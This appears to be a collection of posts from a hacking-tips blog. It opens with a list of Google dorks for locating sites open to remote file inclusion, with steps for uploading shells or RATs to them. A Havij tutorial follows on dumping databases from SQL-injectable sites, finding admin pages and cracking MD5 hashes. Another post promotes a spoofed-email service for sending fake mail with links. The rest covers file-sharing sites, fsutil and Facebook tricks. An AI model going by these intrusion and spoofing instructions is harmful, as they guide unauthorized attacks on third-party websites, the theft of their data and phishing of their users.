Google Dork For "Remote File Inclusion"

Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

List Of Google Dork For Remote File Inclusion:

• inurl:rte/my_documents/my_files
• inurl:/my_documents/my_files/
• inurl:/shoutbox/expanded.php?conf=
• inurl:/main.php?x=
• inurl:/myPHPCalendar/admin.php?cal_dir=
• inurl:/index.php/main.php?x=
• inurl:/index.php?include=
• inurl:/index.php?x=
• inurl:/index.php?open=
• inurl:/index.php?visualizar=
• inurl:/template.php?pagina=
• inurl:/index.php?pagina=
• inurl:/index.php?inc=
• inurl:"index.php?page=contact.php"
• inurl:"template.php?goto="
• inurl:"video.php?content="
• inurl:"pages.php?page="
• inurl:"index1.php?choix="
• inurl:tinybrowser/upload.php
• inurl:examples/uploadbutton.html
• inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
• inurl:/include/new-visitor.inc.php?lvc_include_dir=
• inurl:/_functions.php?prefix=
• inurl:/cpcommerce/_functions.php?prefix=
• inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
• inurl:/modules/agendax/addevent.inc.php?agendax_path=
• inurl:/ashnews.php?pathtoashnews=
• inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
• inurl:/pm/lib.inc.php?pm_path=
• inurl:/b2-tools/gm-2-b2.php?b2inc=
• inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
• inurl:/modules/agendax/addevent.inc.php?agendax_path=
• inurl:/includes/include_once.php?include_file=
• inurl:/e107/e107_handlers/secure_img_render.php?p=
• intitle:index of? inurl:kindeditor

How to Use Google Dork For Remote File Inclusion:

1. Copy anyone of the Google dork from above list
2. Paste it in Google Search textbox and click Search
3. Now, the Vulnerable Websites are listed in search result
4. Click anyone of the link,You will find upload option on it 
5. Now, you can upload your files like Images,HTML files,Document,Shell,RAT,etc.. ,

This is a simple method to find Remote File Inclusion(RFI) Vulnerable Websites using Google Dork. For an hacker google is not only a search engine its also a tool for hacking. Thank you!!

Visit also:
Disable Google.com From Redirecting To Local Country Google Domain
                            (To Get more Vulnerable Websites)

Please leave your Comment/Suggestion below. . .

Read more...

SQL Injection Using Havij

SQL injection is a code injection technique that exploits a security vulnerability in a website's software. It is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and  password hashes, dump tables and columns, fetching data from the database, running SQL  statements and even accessing the underlying file. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Finding the SQL Vulnerable Websites :

• We will use Google dorks to find the vulnerable websites, Most common dorks for sql injection vulnerable site are:-
  
  inurl:index.php?id=
  inurl:trainers.php?id=
  inurl:buy.php?category=
  inurl:article.php?ID=
  
  
• Just search google using one of the dork and you will see a lot of vulnerable websites. Look like below,
  Example : http://lodge4hacker.com/news.php?id=129


• Now simply add an apostrophe( ' )to the end of url and press enter. If the website replies with an error then it shows that the website is vulnerable to SQL injection.

SQL Injection Using Havij Tool :

• Start Havij and copy the url in target address.( The same url which we used to test for sql injection vulnerability but without ' ).





• Click on the analyses button and wait for Havij to discover the database files for you.


• At the bottom of the Havij terminal you will see the search progress in detail.








• Once a database is found, you can click on tables tab to view the available tables. All the tables that are available in the database of the website are now shown.


• Select that table and click on get columns. You will be listed with various columns that are present in the table.


• Now select those columns whose data you want to retrieve. After selecting the various columns, click on get data to get the values stored in the columns. 

Now the website full database with you, Can do whatever you want !!

Finding Admin Page Using Havij Tool :

• To find admin page in website, Click Find Admin tab


• Now type the website link in Path to search and link start


• Now, You will get admin page listed below

Decrypt MD5 Hash Using Havij :

• To Decrypt MD5 hash , Click MD5 in Havij tool


• Now paste your hash into MD5 hash input box and click start


• Now you will get the decrypted hash in table from various online decryption website

DOWNLOAD :

Havij - Mirror1

Havij Full Version - Mirror2 ( Lodge4 Hacker )

Downlaod Havij Tool Help (PDFs format)

Read more...

Best Browser-Based P2P File Sharing Sites

"Technology Rules the World". Everyone knows technology has taken over the world and has forever changed the way we communicate, connect, share information and transferring files. In those days we want to transfer a file to another we use an email to transfer it but supports only limited amount of size(Up-to 10 MB). and then an online file hosting websites are arrived that too have some limitation limited storage space, maximum file size allowed for transfer or expiry time to collect the file. At last, Now P2P File Sharing Sites are introduced  to overcome this limitation!!

What is Peer to Peer ?
Peer-to-peer file sharing or commonly known as P2P is a convenient way of sharing files over the internet. However, you must be very careful when using P2P because some of the files uploaded to the internet have viruses, spyware and other threats that can harm your PC, So transfer your file only with your friends.
List of Best Browser-Based P2P File Sharing Sites
Files Over Miles

FilesOverMiles is a direct file sharing tool for quickly and securely sending files over the internet. There is no installation or sign up and transferred files are not stored anywhere.

PipeBytes

PipeBytes is favorite web-based P2P file sharing service. There’s no upload limit and your friend could start downloading the file as you upload it.

JetBytes

JetBytes is an experimental direct file transfer tool that lets you quickly send files over the net. The application creates direct link between sender and receiver and does not store files during the transfer

Dushare

Dushare is a simple direct file-transfer service. It makes sending unlimited file sizes between two people as simple as a clicking a link

xFiles

xFiles is a P2P based file transfer service that completely eliminates all of these risks. Just head over to xFiles and choose the file you want to transfer. Once you have selected the file, you will instantly be provided with a URL that you can send to the desired recipient. Once they go to the URL and click claim, the file will start downloading to their computer.

Conclusion
Above  Browser-Based P2P File Sharing Sites are the best Site from my analysis. I always preferred to use Files Over Miles its working good. If you like this post leave a small comment and likes here. . .
Thank you ,
Best Wishes!!

Read more...

Anonymous Hackers Wallpaper

Created

 by 

Lodge 4 Hacker

View In Full Size
(1920X1080)

Read more...

Create File With Fixed Size and Type in Windows

Command Prompt is a non-graphical interface that allows you to interact with your operating system. Once you learn how to use command prompt and their commands, you can unleash supreme power and rule your computer! But really, you can do almost anything with cmd.

Steps:

1. Go to Start->All Programs->Accessories->Right Click on Command Prompt and Click "Run as Administrator
2. Go to Directory on which you want to create that file in Command Prompt
-------------- Command To Change Directory  -------------------
 Cd <Name of Directory>           (To Enter into Directory)
Cd..                                    (To Exit From Current Directory)
----------------------------------------------------------------------

3. Now enter the command to create file with fixed size and type
fsutil file createnew <file name> <size in bytes> 
Example:
 fsutil file createnew test.mp3 20000000000

File is create in your specified directory !!

-------------------------------Descriprion of Fsutil Command--------------------------------
Fsutil is a command-line utility that you can use to perform many FAT and NTFS file system related tasks, such as managing reparse points, managing sparse files, dismounting a volume, or extending a volume. Because fsutil is quite powerful, it should only be used by advanced users who have a thorough knowledge of Windows XP. In addition, you must be logged on as an administrator or a member of the Administrators group in order to use fsutil.
---- Fsutil SubCommands----
8dot3name       8dot3name managment
behavior        Control file system behavior
dirty           Manage volume dirty bit
file            File specific commands
fsinfo          File system information
hardlink        Hardlink management
objectid        Object ID management
quota           Quota management
repair          Self healing management
reparsepoint    Reparse point management
resource        Transactional Resource Manager management
sparse          Sparse file control
transaction     Transaction management
usn             USN management
volume          Volume management
--------------------------
------------------------------------------------------------------------------------------------------

Conclusion:
This tutorial not only shows how to Create File With Fixed Size and Type in Windows and also explains the use of most powerful command "fsutil". If you like  this post please give me a like on above facebook like box

Note:  FSUTIL utility requires administrative privileges.
See Also :
Matrix Code Effect In Command Prompt
Run Commands or DOS Commands For Hackers

Read more...

Use Your Profile Picture As Emoticon In Facebook Chat

Today we are going to see another feature in facebook that recently facebook introduced one of the coolest things ever in their Facebook Chat. For years we are using emoticons to express our feelings but now with this new Facebook People Emoticon Feature we can use any person’s, official page’s or event page’s display picture in Facebook chat.

Steps to Use Your Profile Picture As Emoticon In Facebook Chat :
Step-1 :
Just you need to have a Username for your profile, if you don’t have one then you can set your Facebook profile username here.

Or

You can check the link of your profile and will find a number like this 100003262824948 You can use this instead of your username.
Step-2:
Now, Open the Chat box/Messages and in the text bar write, [[Username]] or [[Profile ID]] and hit Enter.

Example:  [[100003262824948]]   or   [[siva01sankar]]

Now enjoy with new Facebook People Emoticon / Smiley Feature !!

Conclusion:
Facebook is dynamic growing company releasing new feature day by day , Now this feature "Profile Picture As Emoticon In Facebook Chat" has some limitation that these custom emoticons can be sent using Mobile devices however they cannot be viewed as graphics in the mobile, They will be displayed as the brackets with codes in the mobile view but on the desktop view they would appear normally. Keep visiting our blog and please leave your small comment below help me to increase my blogging skills.

Read more...

Update Facebook Status Via “YOUR NAME”

We are always looking for ways to impress our friends, maybe though the latest applications or a status,Facebook is a community where we can connect and share with others. We can watch that most of them updating their comments from different application and devices like iPhone, Android, Twitter, etc . . .,
Here we going to see how to update via your name !!

How exactly is this done though?
We need to create our own personalized application, writing an coding for an application is a difficult and long time process . But here we are going to use small trick to update our status via any name as you like. Let's see how to do this !!

Steps to Update Facebook Status Via “YOUR NAME” :-

• Goto Facebook Developers
• Now Goto Create New App ( In Upper RightSide of the Page)
• Now Enter App Display Name and Agree Facebook Platform Policies.
• Then Security Check (CAPTCHA), You will be taken to the Dashboard after Security Check
• Now you can see your application numbers ( App ID/API Key ) Note your App ID
• Now Goto "https://www.facebook.com/connect/prompt_feed.php?preview=true&api_key=XXXXXXXXXXX" after replacing XXXXXXXXXXX with your App ID

Example :

https://www.facebook.com/connect/prompt_feed.php?preview=true&api_key=352321714793240

• Now you will see an Facebook status bar , where you can update anything you want via your own App name

Please leave your comment Below !!

Read more...

Facebook launches Messenger for Windows Now Officially Available For Download

Facebook is a social utility that connects people with friends and others who work, study and live around them. Facebook launched in February 2004 in a short period it reaches to a position #2 (Alexa Traffic Rank) with its dynamic and user friendly Services. Now Facebook launches messenger for windows allows users to connect with their friends without relying on a browser to sign in.

Facebook said in its Help Center that :

Messenger is a new, trial application that lets you use Facebook without being on www.facebook.com. While you surf the web or use other applications on your computer, you can: 

• Chat and message with your friends on Facebook
• See the latest updates from your friends in ticker
• Get quick notifications about what’s going on

We’re testing out a first version of the app with a small group of people. During this trial period, we plan on rolling out changes to the app and expect outages and periods of instability as we make improvements

Conclusion:
Overall Facebook Messenger provides an awesome features. It allow users access to the real time aspects of the website without the need to have the browser open and have the distraction of all of the features.

[ Download Facebook Messenger for Windows (EXE) ]

Read more...

Online Email Spoofing Using Emkei's Fake Mailer

Email spoofing is email activity in which the sender address and other parts of the email header are altered to appear as though the email originated from a different source.

Emkei's Fake Mailer is a website to send fake emails from anybody to anybody . Emkei is a fake mail server that captures emails as files for acceptance testing. This avoids the excessive configuration of setting up a real mail server and trying to extract mail queue content. There are many free services that allow you to send fake emails, but some of them do not allow sending Links (URL’s) along with the fake email . If you need such service for sending fake emails with hyperlinks , then I would recommend Emkei’s Fake Mailer. This is a useful website which allows you to send fake emails.

Click Here Go To Emkei's Fake Mailer Here

Note : Kindly do not misuse it for any other purposes.Your IP address gets saved on there server, So do not misuse this free service.

Read more...

Redhat Linux Wallpaper

Read more...